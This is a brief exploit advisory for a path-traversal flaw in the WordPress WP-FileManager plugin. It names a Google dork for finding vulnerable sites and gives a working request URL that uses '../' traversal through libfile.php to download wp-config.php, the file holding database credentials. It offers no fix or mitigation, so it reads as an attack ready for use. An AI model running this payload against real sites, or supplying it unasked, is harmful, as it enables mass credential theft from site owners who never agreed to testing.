Download: http://wordpress.org/extend/plugins/wp-filemanager/
Vuln. Plat.: Web Application
Test Platform : Linux
==============================================
Exploit Note :
In order for this to work, the "Allow Download" setting must be checked in the FileManager's settings.
Google Dorks :
inurl:wp-content/plugins/wp-filemanager/
Test :
http://server/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download
Oke,sekian dari Clound
